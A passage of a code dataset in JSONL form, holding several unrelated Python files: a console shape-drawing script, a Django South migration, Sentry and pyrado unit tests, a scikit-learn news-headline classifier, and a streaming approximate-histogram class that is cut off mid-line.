2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1\n 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1\n '''\n import math\n\n def get_distance_from_center(center_x, center_y, point_x, point_y):\n '''\n Based on Pythagoras' theorem, it calculates the length by the point from the center of the circle.\n ____________________\n |AB| = \\\\/ (Xa-Xb)² + (Ya-Yb)²\n '''\n\n return round(math.sqrt(math.pow(abs(center_x - point_x), 2) + math.pow(abs(center_y - point_y), 2)), 0)\n\n def create_matrix(size_x, size_y):\n '''Sets matrix.'''\n matrix = []\n for row_no in range(size_x):\n row = []\n for col_no in range(size_y):\n row.append(NULL_CELL)\n matrix.append(row)\n return matrix\n\n def fill_empty(matrix, radius):\n '''Fills the matrix with empty cells located outside the circle.'''\n center_x, center_y = 0, 1\n circle_center = (radius - 1, radius - 1)\n\n for x in range(size_x):\n for y in range(size_y):\n distance = get_distance_from_center(circle_center[center_x], circle_center[center_y], x, y)\n if distance >= radius:\n matrix[x][y] = ZERO_CELL\n return matrix\n\n def fill_border(matrix, border_color):\n '''Fills matrix with border cells.'''\n for x in range(size_x):\n for y in range(size_y):\n if matrix[x][y] == NULL_CELL: # cell to fill\n if x == 0 or x == size_x - 1 or y == 0 or y == size_y - 1: # the first and the last row and column\n matrix[x][y] = border_color\n elif matrix[x][y - 1] == ZERO_CELL or matrix[x][y + 1] == ZERO_CELL or matrix[x - 1][y] == ZERO_CELL or matrix[x + 1][y]: # checks whether it is adjacent to zero (before, after, above, under)\n matrix[x][y] = border_color\n return matrix\n\n # ------- draw_circle main code -------\n size_x = radius - 1 if half is True else radius * 2 - 1\n size_y = radius * 2 - 1\n\n matrix = create_matrix(size_x, size_y)\n matrix = fill_empty(matrix, radius)\n matrix = fill_border(matrix, border_color)\n matrix = fill_normal(matrix, fill_color)\n\n return matrix\n\n\ndef embroider(matrix, color_scheme):\n '''Draws on screen (console) created the matrix with patterns.'''\n for row in matrix:\n for cell in row:\n print(color_scheme[cell], end=' ')\n print()\n print()\n\n\n# -------------------------------------- internal functions ---------------------------------------\n\ndef create_triangle(matrix_height, matrix_width, fill_color, border_color, border_last_row=True, base_width=None):\n '''\n Returns matrix filled with triangle pattern. Default values: base_width = matrix_width\n\n 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 2 2 2 2 2 1 0 0\n 0 0 1 2 1 0 0 0 0 1 2 1 0 0 0 0 0 0 1 2 1 0 0 0 0 0 1 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 1 0 0 1 2 2 2 1 0 0 0 0 1 1 1 1 1 0 0 0 1 2 2 2 2 2 2 2 2 2 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1\n\n height = 4 matrix_height = 4 matrix_height = None matrix_height = None\n matrix_width = 7 matrix_width = 7 matrix_width = 11 matrix_width = 11\n base_width=None base_width=None base_width=5 base_width=None\n border_last_row=True border_last_row=False border_last_row=True border_last_row=False\n '''\n def fill_empty(matrix_height, matrix_width, base_width):\n '''Fills matrix with empty cells (zeros).'''\n matrix = []\n\n empty_cell = (matrix_width - base_width) / 2 + (matrix_height - 1) # number of empty cells one side from the middle column\n for row_no in range(matrix_height):\n row = []\n for col_no in range(matrix_width):\n row.append(ZERO_CELL) if (col_no + 1 <= empty_cell or matrix_width - col_no <= empty_cell) else row.append(NULL_CELL) # empty cells from left or right side\n\n matrix.append(row)\n empty_cell -= 1\n\n return matrix\n\n def fill_border(matrix, border_color, border_last_row):\n '''Fills matrix with border cells.'''\n for row_no in range(matrix_height):\n for col_no in range(matrix_width):\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n if col_no == 0 or matrix[row_no][col_no - 1] == ZERO_CELL or col_no == matrix_width - 1 or matrix[row_no][col_no + 1] == ZERO_CELL:\n matrix[row_no][col_no] = border_color\n\n if border_last_row:\n for col_no in range(matrix_width): # fills the last row border cell\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n matrix[matrix_height - 1][col_no] = border_color\n return matrix\n\n # ------- create_triangle main code -------\n if base_width is None: # base_width default value\n base_width = matrix_width\n elif base_width < matrix_height: # the minimum base fills the entire height\n base_width = (matrix_height * 2) - 1\n\n matrix = fill_empty(matrix_height, matrix_width, base_width)\n matrix = fill_border(matrix, border_color, border_last_row)\n matrix = fill_normal(matrix, fill_color)\n\n return matrix\n\n\ndef fill_normal(matrix, fill_color):\n '''Fills matrix with normaln filled cells.'''\n matrix_height, matrix_width = len(matrix), len(matrix[0])\n\n for row_no in range(matrix_height):\n for col_no in range(matrix_width):\n if matrix[row_no][col_no] == NULL_CELL: # cell to fill\n matrix[row_no][col_no] = fill_color\n return matrix\n\n\n# ------------------------------------------- main code -------------------------------------------\n\nif __name__ == '__main__':\n color_scheme = {ZERO_CELL: '0', 1: '1', 2: '2'}\n\n print(\"Rectangle:\")\n embroider(draw_rectangle(19, 19, 1, 2, 3), color_scheme)\n print(\"Triangle:\")\n embroider(draw_triangle(10, border_color=1, fill_color=2), color_scheme)\n print(\"Christmas tree:\")\n embroider(draw_christmas_tree(8, 1, 2), color_scheme)\n print(\"Circle:\")\n embroider(draw_circle(15, 1, 2), color_scheme)\n"} {"ext": "py", "sha": "1a2fe258a7a0651b5613d4a8e173a6e631ac491d", "content": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding field 'Banner.disabled'\n db.add_column(u'mx_banner', 'disabled',\n self.gf('django.db.models.fields.BooleanField')(default=False),\n keep_default=False)\n\n\n def backwards(self, orm):\n # Deleting field 'Banner.disabled'\n db.delete_column(u'mx_banner', 'disabled')\n\n\n models = {\n u'downtime.period': {\n 'Meta': {'object_name': 'Period'},\n 'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),\n 'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})\n },\n u'mx.banner': {\n 'Meta': {'object_name': 'Banner'},\n 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),\n 'days': ('django.db.models.fields.PositiveIntegerField', [], {}),\n 'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),\n 'message': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'period': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['downtime.Period']\"}),\n 'title': ('django.db.models.fields.CharField', [], {'max_length': '25'})\n }\n }\n\n complete_apps = ['mx']"} {"ext": "py", "sha": "1a2fe4209f60b2aa39a190e6e08b53c970a9149a", "content": "from __future__ import absolute_import\n\nfrom mock import MagicMock, patch\n\nfrom sentry.testutils.cases import RuleTestCase\nfrom sentry.rules.actions.notify_event_service import NotifyEventServiceAction\nfrom sentry.tasks.sentry_apps import notify_sentry_app\n\n\nclass NotifyEventServiceActionTest(RuleTestCase):\n rule_cls = NotifyEventServiceAction\n\n def test_applies_correctly_for_plugins(self):\n event = self.get_event()\n\n plugin = MagicMock()\n plugin.is_enabled.return_value = True\n plugin.should_notify.return_value = True\n\n rule = self.get_rule(data={\"service\": \"mail\"})\n\n with patch(\"sentry.plugins.plugins.get\") as get_plugin:\n get_plugin.return_value = plugin\n\n results = list(rule.after(event=event, state=self.get_state()))\n\n assert len(results) is 1\n assert plugin.should_notify.call_count is 1\n assert results[0].callback is plugin.rule_notify\n\n def test_applies_correctly_for_sentry_apps(self):\n event = self.get_event()\n\n self.create_sentry_app(\n organization=event.organization, name=\"Test Application\", is_alertable=True\n )\n\n rule = self.get_rule(data={\"service\": \"test-application\"})\n\n results = list(rule.after(event=event, state=self.get_state()))\n\n assert len(results) is 1\n assert results[0].callback is notify_sentry_app\n"} {"ext": "py", "sha": "1a2fe48ebdb2b88fc6f3dd24f3c29d964431cc31", "content": "import pytest\nimport torch as to\nimport torch.nn as nn\nfrom functools import partial\nfrom tqdm import tqdm\n\nfrom pyrado.sampling.utils import gen_batches, gen_ordered_batches\nfrom pyrado.utils.data_types import *\nfrom pyrado.utils.functions import noisy_nonlin_fcn\nfrom pyrado.utils.math import cosine_similarity, cov\nfrom pyrado.environments.pysim.ball_on_beam import BallOnBeamSim\nfrom pyrado.policies.dummy import DummyPolicy\nfrom pyrado.sampling.rollout import rollout\nfrom pyrado.sampling.step_sequence import StepSequence\nfrom pyrado.utils.nn_layers import IndiNonlinLayer\nfrom pyrado.utils.optimizers import GSS\nfrom pyrado.utils.averaging import RunningExpDecayingAverage, RunningMemoryAverage\nfrom pyrado.utils.standardizing import RunningStandardizer, Standardizer\nfrom pyrado.utils.normalizing import RunningNormalizer, normalize\n\n\n@pytest.mark.parametrize(\n 'x, data_along_rows', [\n (np.random.rand(100, 4), True),\n (np.random.rand(4, 100), False)\n ], ids=['100_4', '4_100']\n)\ndef test_cov(x, data_along_rows):\n rowvar = not data_along_rows\n cov_np = np.cov(x, rowvar=rowvar)\n cov_pyrado = cov(to.from_numpy(x), data_along_rows=data_along_rows).numpy()\n\n assert cov_pyrado.shape[0] == cov_pyrado.shape[1]\n if data_along_rows:\n assert cov_np.shape[0] == x.shape[1]\n assert cov_pyrado.shape[0] == x.shape[1]\n else:\n assert cov_np.shape[0] == x.shape[0]\n assert cov_pyrado.shape[0] == x.shape[0]\n assert np.allclose(cov_np, cov_pyrado)\n\n\n@pytest.mark.parametrize(\n 'env, expl_strat', [\n (BallOnBeamSim(dt=0.02, max_steps=100),\n DummyPolicy(BallOnBeamSim(dt=0.02, max_steps=100).spec)),\n ], ids=['bob_dummy']\n)\ndef test_concat_rollouts(env, expl_strat):\n ro1 = rollout(env, expl_strat)\n ro2 = rollout(env, expl_strat)\n ro_cat = StepSequence.concat([ro1, ro2])\n assert isinstance(ro_cat, StepSequence)\n assert ro_cat.length == ro1.length + ro2.length\n\n\n@pytest.mark.parametrize(\n 'x, y', [\n (to.tensor([1., 2., 3.]), to.tensor([1., 2., 3.])),\n (to.tensor([1., 0., 1.]), to.tensor([1., 1e12, 1.])),\n (to.tensor([0., 0., 0.]), to.tensor([1., 2, 3.])),\n (to.tensor([1., 2., 3.]), to.tensor([2., 4., 6.])),\n (to.tensor([1., 2., 3.]), to.tensor([-1., -2., -3.])),\n ], ids=['same', 'similarity_1', 'similarity_0', 'colinear_scaled', 'colinear_opposite']\n)\ndef test_cosine_similarity(x, y):\n # Only tested for vector inputs\n d_cos = cosine_similarity(x, y)\n assert isinstance(d_cos, to.Tensor)\n # The examples are chosen to result in 0, 1, or -1\n assert to.isclose(d_cos, to.tensor(0.)) or to.isclose(d_cos, to.tensor(1.)) or to.isclose(d_cos, to.tensor(-1.))\n\n\n@pytest.mark.parametrize(\n 'x, y', [\n ({'a': 1, 'b': 2}, {'c': 1, 'd': 4}),\n ({'a': 1, 'b': 2}, {'b': 3, 'd': 4}),\n ], ids=['disjoint', 'overlapping']\n)\ndef test_merge_lod_var_dtype(x, y):\n z = merge_lod_var_dtype([x, y])\n assert z['a'] == 1\n if z['b'] == 2: # disjoint\n assert z['c'] == 1\n elif z['b'] == 3: # overlapping\n assert len(z) == 3\n else:\n assert False\n assert z['d'] == 4\n\n\n@pytest.mark.parametrize(\n 'batch_size, data_size', [\n (3, 30),\n (3, 29),\n (3, 28),\n (2, 2)\n ], ids=['division_mod0', 'division_mod1', 'division_mod2', 'edge_case']\n)\ndef test_gen_ordered_batches(batch_size, data_size):\n from math import ceil\n\n generator = gen_batches(batch_size, data_size)\n unordered_batches = list(generator)\n assert len(unordered_batches) == ceil(data_size/batch_size)\n assert all(len(uob) <= batch_size for uob in unordered_batches)\n\n generator = gen_ordered_batches(batch_size, data_size)\n ordered_batches = list(generator)\n assert len(ordered_batches) == ceil(data_size/batch_size)\n assert all(len(ob) <= batch_size for ob in ordered_batches)\n # Check if each mini-batch is sorted\n assert all(all(ob[i] <= ob[i + 1] for i in range(len(ob) - 1)) for ob in ordered_batches)\n\n\n@pytest.mark.parametrize('dtype', ['torch', 'numpy'], ids=['to', 'np'])\n@pytest.mark.parametrize('axis', [0, 1], ids=['ax_0', 'ax_1'])\ndef test_normalize(dtype, axis):\n for _ in range(10):\n x = to.rand(5, 3) if dtype == 'torch' else np.random.rand(5, 3)\n x_norm = normalize(x, axis=axis, order=1)\n if isinstance(x_norm, to.Tensor):\n x_norm = x_norm.numpy() # for easier checking with pytest.approx\n assert np.sum(x_norm, axis=axis) == pytest.approx(1.)\n\n\n@pytest.mark.parametrize(\n 'data_seq, axis', [\n ([np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])], 0),\n ([np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])], None),\n ([np.array([1, 1, 2, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, 10, -20, 20])], 0),\n ([np.array([1, 1, 2, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, 10, -20, 20])], None),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]),\n to.tensor([10., -20., 20.])],\n 0),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]),\n to.tensor([10., -20., 20.])],\n -1),\n (\n [to.tensor([1., 1, 2, 2]), to.tensor([1., 6, 3]), to.tensor([1., 6, 3]),\n to.tensor([10., 10, -20, 20])],\n 0),\n (\n [to.tensor([1., 1, 2, 2]), to.tensor([1., 6, 3]), to.tensor([1., 6, 3]),\n to.tensor([10., 10, -20, 20])],\n -1),\n ], ids=['np_same_length_0', 'np_same_length_None', 'np_mixed_length_0', 'np_mixed_length_None',\n 'to_same_length_0', 'to_same_length_-1', 'to_mixed_length_0', 'to_mixed_length_-1']\n)\ndef test_running_standardizer(data_seq, axis):\n rs = RunningStandardizer()\n for data in data_seq:\n z = rs(data, axis)\n assert z is not None\n rs.reset()\n assert rs._mean is None and rs._sum_sq_diffs is None and rs._iter == 0\n\n\n@pytest.mark.parametrize(\n 'data_seq, alpha', [\n (\n [np.array([1, 1, 2]), np.array([1, 6, 3]), np.array([1, 6, 3]), np.array([10, -20, 20])],\n 0.9\n ),\n (\n [to.tensor([1., 1., 2]), to.tensor([1., 6., 3.]), to.tensor([1., 6., 3.]), to.tensor([10., -20., 20.])],\n 0.1\n ),\n ], ids=['np', 'to']\n)\ndef test_running_expdecay_average(data_seq, alpha):\n reda = RunningExpDecayingAverage(alpha)\n for data in data_seq:\n z = reda(data)\n assert z is not None\n reda.reset(alpha=0.5)\n assert reda._alpha == 0.5 and reda._prev_est is None\n\n\n@pytest.mark.parametrize(\n 'data_seq, capacity', [\n (\n [np.array([1., 1, 2]), np.array([1., 1, 2]), np.array([1., 1, 2]), np.array([-2., -2, -4])],\n 3\n ),\n (\n [to.tensor([1., 1, 2]), to.tensor([1., 1, 2]), to.tensor([1., 1, 2]), to.tensor([-2., -2, -4])],\n 3\n ),\n ], ids=['np', 'to']\n)\ndef test_running_mem_average(data_seq, capacity):\n rma = RunningMemoryAverage(capacity)\n for i, data in enumerate(data_seq):\n z = rma(data)\n if i <= 2:\n to.testing.assert_allclose(z, to.tensor([1., 1, 2])) # works with PyTorch Tensors and numpy arrays\n elif i == 3:\n to.testing.assert_allclose(z, to.tensor([0., 0, 0])) # works with PyTorch Tensors and numpy arrays\n rma.reset(capacity=5)\n assert rma.capacity == 5 and rma.memory is None\n\n\n@pytest.mark.parametrize(\n 'data_seq', [\n [5*np.random.rand(25, 3), 0.1*np.random.rand(5, 3), 20*np.random.rand(70, 3)],\n [5*to.rand(25, 3), 0.1*to.rand(5, 3), 20*to.rand(70, 3)]\n ], ids=['np', 'to']\n)\ndef test_running_normalizer(data_seq):\n rn = RunningNormalizer()\n for data in data_seq:\n data_norm = rn(data)\n assert (-1 <= data_norm).all()\n assert (data_norm <= 1).all()\n\n\n@pytest.mark.parametrize(\n 'x', [\n to.rand(1000, 1),\n to.rand(1, 1000),\n to.rand(1000, 1000),\n np.random.rand(1, 1000),\n np.random.rand(1000, 1),\n np.random.rand(1000, 1000)\n ], ids=['to_1x1000', 'to_1000x1', 'to_1000x1000', 'np_1x1000', 'np_1000x1', 'np_1000x1000']\n)\ndef test_stateful_standardizer(x):\n ss = Standardizer()\n\n if isinstance(x, to.Tensor):\n x_stdized = ss.standardize(x)\n assert x_stdized.shape == x.shape\n assert to.allclose(x_stdized.mean(), to.zeros(1))\n assert to.allclose(x_stdized.std(), to.ones(1))\n\n x_restrd = ss.unstandardize(x_stdized)\n assert x_restrd.shape == x.shape\n assert to.allclose(x_restrd, x, rtol=1e-02, atol=1e-05)\n\n elif isinstance(x, np.ndarray):\n x_stdized = ss.standardize(x)\n assert x_stdized.shape == x.shape\n assert np.allclose(x_stdized.mean(), np.zeros(1))\n assert np.allclose(x_stdized.std(), np.ones(1))\n\n x_restrd = ss.unstandardize(x_stdized)\n assert x_restrd.shape == x.shape\n assert np.allclose(x_restrd, x, rtol=1e-02, atol=1e-05)\n\n\n@pytest.mark.parametrize(\n 'g, ed', [\n (1., 2.),\n (np.array([-1., 2.]), np.eye(2))\n ], ids=['scalar', 'array']\n)\ndef test_ds_spec(g, ed):\n # Base class\n dss = DSSpec(function='name', goal=g)\n assert isinstance(dss, dict)\n assert dss['function'] == 'name'\n if isinstance(g, np.ndarray):\n assert np.all(dss['goal'] == g)\n else:\n assert dss['goal'] == g\n\n # Linear first order subclass\n lds = LinDSSpec(function='lin', goal=g, errorDynamics=ed)\n assert isinstance(dss, dict)\n assert lds['function'] == 'lin'\n if isinstance(g, np.ndarray):\n assert np.all(lds['goal'] == g)\n assert np.all(lds['errorDynamics'] == ed)\n else:\n assert lds['goal'] == g\n assert lds['errorDynamics'] == ed\n\n # Mass-Spring-Damper subclass\n msds = MSDDSSpec(function='msd', goal=g, damping=2., attractorStiffness=3., mass=4.)\n assert isinstance(dss, dict)\n assert msds['function'] == 'msd'\n if isinstance(g, np.ndarray):\n assert np.all(msds['goal'] == g)\n else:\n assert msds['goal'] == g\n assert msds['damping'] == 2.\n assert msds['attractorStiffness'] == 3.\n assert msds['mass'] == 4.\n\n\n@pytest.mark.optim\n@pytest.mark.visualization\n@pytest.mark.parametrize(\n 'identical_bounds', [\n True, False\n ], ids=['identical', 'separate']\n)\ndef test_gss_optimizer_identical_bounds(identical_bounds):\n class Dummy:\n def loss_fcn(self):\n # Some function to minimize\n return (self.x + self.y + 4)**2\n\n def __init__(self):\n # Test with different lower and upper bounds\n self.x, self.y = to.tensor([0.]), to.tensor([4.])\n x_min, x_max = to.tensor([-10.]), to.tensor([5.])\n if identical_bounds:\n self.optim = GSS([{'params': self.x}, {'params': self.y}], x_min, x_max)\n else:\n x_min_override = to.tensor([-6.])\n self.optim = GSS([{'params': self.x, 'param_min': x_min_override}, {'params': self.y}], x_min, x_max)\n print(self.optim)\n\n dummy = Dummy()\n\n for i in range(2):\n dummy.optim.step(dummy.loss_fcn)\n assert dummy.x != dummy.y\n print(f'x = {dummy.x.item()} \\t y = {dummy.y.item()}')\n\n\n@pytest.mark.optim\ndef test_gss_optimizer_functional():\n class Dummy:\n def loss_fcn(self):\n # Some function to minimize\n return (self.x + 4)**2\n\n def __init__(self):\n # Test with different lower and upper bounds\n self.x = to.tensor([0.])\n x_min, x_max = to.tensor([-10.]), to.tensor([10.])\n self.optim = GSS([{'params': self.x}], x_min, x_max)\n\n dummy = Dummy()\n\n for i in range(100):\n dummy.optim.step(dummy.loss_fcn)\n assert to.norm(dummy.x + 4) < 1e-4\n\n\n@pytest.mark.optim\n@pytest.mark.visualization\ndef test_gss_optimizer_nlin_fcn():\n from matplotlib import pyplot as plt\n # Parameters\n x_grid = to.linspace(-2., 3., 200)\n f = 1.\n noise_std = 0.1\n\n # Init param and optimizer\n x_init = to.rand(1)*(x_grid.max() - x_grid.min())/2 + x_grid.min() + (x_grid.max() - x_grid.min())/4 # [.25, .75]\n x = nn.Parameter(to.tensor([x_init]), requires_grad=False)\n optim = GSS([x], param_min=x_grid.min().unsqueeze(0), param_max=x_grid.max().unsqueeze(0))\n obj_fcn = partial(noisy_nonlin_fcn, x=x, f=f, noise_std=noise_std)\n num_epochs = 10\n\n # Init plotting\n fig = plt.figure()\n plt.plot(x_grid, noisy_nonlin_fcn(x=x_grid, f=f), label='noise free fcn')\n plt.scatter(x.data.numpy(), obj_fcn().numpy(), s=40, marker='x', color='k', label='init guess')\n colors = plt.get_cmap('inferno')(np.linspace(0, 1, num_epochs))\n\n for e in tqdm(range(num_epochs), total=num_epochs):\n # Evaluate at a the current point\n optim.step(obj_fcn)\n\n # Plot current evaluation\n plt.plot(x_grid, noisy_nonlin_fcn(x=x_grid, f=f, noise_std=noise_std), alpha=0.2)\n plt.scatter(x.data.numpy(), obj_fcn().numpy(), s=16, color=colors[e])\n\n plt.xlabel('$x$')\n plt.ylabel('$f(x)$')\n plt.legend()\n plt.show()\n assert noisy_nonlin_fcn(x, f=f, noise_std=noise_std) < noisy_nonlin_fcn(x_init, f=f, noise_std=noise_std)\n\n\n@pytest.mark.parametrize('in_features', [1, 3], ids=['1dim', '3dim'])\n@pytest.mark.parametrize('same_nonlin', [True, False], ids=['same_nonlin', 'different_nonlin'])\n@pytest.mark.parametrize('bias', [True, False], ids=['bias', 'no_bias'])\n@pytest.mark.parametrize('weight', [True, False], ids=['weight', 'no_weight'])\ndef test_indi_nonlin_layer(in_features, same_nonlin, bias, weight):\n if not same_nonlin and in_features > 1:\n nonlin = in_features*[to.tanh]\n else:\n nonlin = to.sigmoid\n layer = IndiNonlinLayer(in_features, nonlin, bias, weight)\n assert isinstance(layer, nn.Module)\n\n i = to.randn(in_features)\n o = layer(i)\n assert isinstance(o, to.Tensor)\n assert i.shape == o.shape\n"} {"ext": "py", "sha": "1a2fe54d88c1e5c718bd8552ab2e975dc2d3be6e", "content": "# --------------\n# import packages\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nimport re\nfrom nltk.corpus import stopwords\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score ,confusion_matrix\n\n\n# Code starts here\n\n# load data\nnews = pd.read_csv(path)\n\n# subset data\nnews = news[['TITLE','CATEGORY']]\n# distribution of classes\ndist = news['CATEGORY'].value_counts()\n\n# display class distribution\nprint(dist.head())\n\n# display data\nprint(news.head())\n\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# stopwords \nstop = (set(stopwords.words('english')))\n# retain only alphabets\nnews['TITLE'] = news['TITLE'].apply(lambda x : re.sub(\"[^a-zA-Z]\", \" \",x) )\n\n# convert to lowercase and tokenize\nnews['TITLE'] = news['TITLE'].apply(lambda x : x.lower().split())\n\n# remove stopwords\nnews['TITLE'] = news['TITLE'].apply(lambda x : [i for i in x if i not in stop])\n\n# join list elements\nprint(news['TITLE'].head(2))\nnews['TITLE'] = news['TITLE'].apply(lambda x : ' '.join(x))\nprint(news['TITLE'].head(2))\n# split into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(news['TITLE'], news['CATEGORY'], test_size=0.2, random_state=3)\n\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# initialize count vectorizer\ncount_vectorizer = CountVectorizer()\n\n# initialize tfidf vectorizer\ntfidf_vectorizer = TfidfVectorizer(ngram_range=(1,3))\n\n# fit and transform with count vectorizer\nX_train_count= count_vectorizer.fit_transform(X_train)\nX_test_count = count_vectorizer.transform(X_test)\n\n# fit and transform with tfidf vectorizer\nX_train_tfidf= tfidf_vectorizer.fit_transform(X_train)\nX_test_tfidf = tfidf_vectorizer.transform(X_test)\n# Code ends here\n\n\n# --------------\n# Code starts here\n\n# initialize multinomial naive bayes\nnb_1 = MultinomialNB()\nnb_2 = MultinomialNB()\n\n# fit on count vectorizer training data\nnb_1.fit(X_train_count, y_train)\n# fit on tfidf vectorizer training data\nnb_2.fit(X_train_tfidf, y_train)\n\n# accuracy with count vectorizer\nacc_count_nb = accuracy_score(nb_1.predict(X_test_count), y_test)\n\n# accuracy with tfidf vectorizer\nacc_tfidf_nb = accuracy_score(nb_2.predict(X_test_tfidf), y_test)\n\n# display accuracies\nprint('Count Vectorizer accuracy is', acc_count_nb)\nprint('TFIDF accuracy is', acc_tfidf_nb)\n\n\n# Code ends here\n\n\n# --------------\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# initialize logistic regression\nlogreg_1 = OneVsRestClassifier(LogisticRegression(random_state=10))\nlogreg_2 = OneVsRestClassifier(LogisticRegression(random_state=10))\n\n# fit on count vectorizer training data\nlogreg_1.fit(X_train_count, y_train)\nlogreg_2.fit(X_train_tfidf, y_train)\n# fit on tfidf vectorizer training data\nacc_count_logreg = accuracy_score(logreg_1.predict(X_test_count), y_test)\nacc_tfidf_logreg = accuracy_score(logreg_2.predict(X_test_tfidf), y_test)\n# accuracy with count vectorizer\nprint('Count vectorizer accurancy is', acc_count_logreg)\n# accuracy with tfidf vectorizer\nprint('TFIDF accuracy is', acc_tfidf_logreg)\n\n# display accuracies\n\n\n# Code ends here\n\n\n"} {"ext": "py", "sha": "1a2fe588feedd1327744d61141ef0189c19be486", "content": "from bisect import bisect_right\nfrom itertools import accumulate\nfrom math import inf, sqrt\nfrom numbers import Number\n\n\nclass ApproximateHistogram:\n \"\"\"\n Streaming, approximate histogram\n\n Based on http://jmlr.org/papers/volume11/ben-haim10a/ben-haim10a.pdf\n\n Performance of adding a point is about 5x faster than\n https://github.com/carsonfarmer/streamhist (unmaintained).\n\n The output of quantile() will match numpy.quantile() exactly until\n the number of points reaches max_bins, and then gracefully transition\n to an approximation.\n \"\"\"\n\n def __init__(self, max_bins):\n self._max_bins = max_bins\n self._bins = [] # (point, count)\n self._costs = [] # item i is _bins[i+1].point - _bins[i].point\n self._count = 0\n # TODO: maintain min/max as bin entries with infinite merge cost\n self._min = inf\n self._max = -inf\n\n @staticmethod\n def _update_costs(costs, l, i, val):\n \"\"\"update costs array to reflect l.insert(i, val)\"\"\"\n if i > 0:\n new_cost = val[0] - l[i - 1][0]\n costs.insert(i - 1, new_cost)\n if i < len(costs):\n costs[i] = l[i + 1][0] - val[0]\n elif len(l) > 1:\n costs.insert(0, l[1][0] - val[0])\n # assert costs == approx([b - a for (a, _), (b, _) in zip(l, l[1:])], rel=1e-4)\n\n @staticmethod\n def _update_costs_for_merge(costs, l, i, val):\n \"\"\"update costs array to reflect l[i:i+2] = (val, )\"\"\"\n # TODO: combine with update_costs()\n if 0 < i < len(costs) - 1:\n costs[i - 1:i + 2] = val[0] - l[i - 1][0], l[i + 1][0] - val[0]\n elif i > 0:\n costs[i - 1:i + 1] = (val[0] - l[i - 1][0], )\n else:\n costs[i:i + 2] = (l[i + 1][0] - val[0], )\n # assert costs == approx([b - a for (a, _), (b, _) in zip(l, l[1:])], rel=1e-4)\n\n @classmethod\n def _insert_with_cost(cls, costs, l, val):\n i = bisect_right(l, val)\n l.insert(i, val)\n cls._update_costs(costs, l, i, val)\n\n def add(self, point):\n \"\"\"Add point to histogram\"\"\"\n # optimization: maintain cost array\n self._count += 1\n self._min = min(self._min, point)\n self._max = max(self._max, point)\n bins = self._bins\n costs = self._costs\n self._insert_with_cost(costs, bins, (point, 1))\n if len(bins) > self._max_bins:\n i = costs.index(min(costs))\n (q0, k0), (q1, k1) = bins[i:i+2]\n _count = k0 + k1\n median = (q0 * k0 + q1 * k1) / _count\n bins[i:i+2] = ((median, _count), )\n self._update_costs_for_merge(costs, bins, i, (median, _count))\n\n @property\n def count(self):\n \"\"\"Return number of points represented by this histogram.\"\"\"\n return self._count\n\n @property\n def min(self):\n \"\"\"Return minimum point represented by this histogram\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Return maximum point represented by this histogram\"\"\"\n return self._max\n\n def mean(self):\n \"\"\"Return mean; O(max_bins) complexity.\"\"\"\n return sum(p * count for p, count in self._bins) / self._count\n\n def std(self):\n \"\"\"Return standard deviation; O(max_bins) complexity.\"\"\"\n mean = self.mean()\n sum_squares = sum((p - mean) ** 2 * count for p, count in self._bins)\n return sqrt(sum_squares / self._count)\n\n def _quantile(self, sums, q):\n if q <= 0:\n return self._min\n if q >= 1:\n return self._max\n bins = self._bins\n target_sum = q * (self._count - 1) + 1\n i = bisect_right(sums, target_sum) - 1\n left = bins[i] if i >= 0 else (self._min, 0)\n right = bins[i+1] if i+1 < len(bins) else (self._max, 0)\n l0, r0 = left[0], right[0]\n l1, r1 = left[1], right[1]\n s = target_sum - (sums[i] if i >= 0 else 1)\n if l1 <= 1 and r1 <= 1:\n # We have exact info at this quantile. Match linear interpolation\n # strategy of numpy.quantile().\n b = l0 + (r0 - l0) * s / r1 if r1 > 0 else l0\n else:\n if r1 == 1:\n # For exact bin on RHS, compensate for trapezoid interpolation using\n # only half of count.\n r1 = 2\n if l1 == r1:\n bp_ratio = s / l1\n else:\n bp_ratio = (l1 - (l1 ** 2 - 2 * s * (l1 - r1)) ** .5) / (l1 - r1)\n assert bp_ratio.imag == 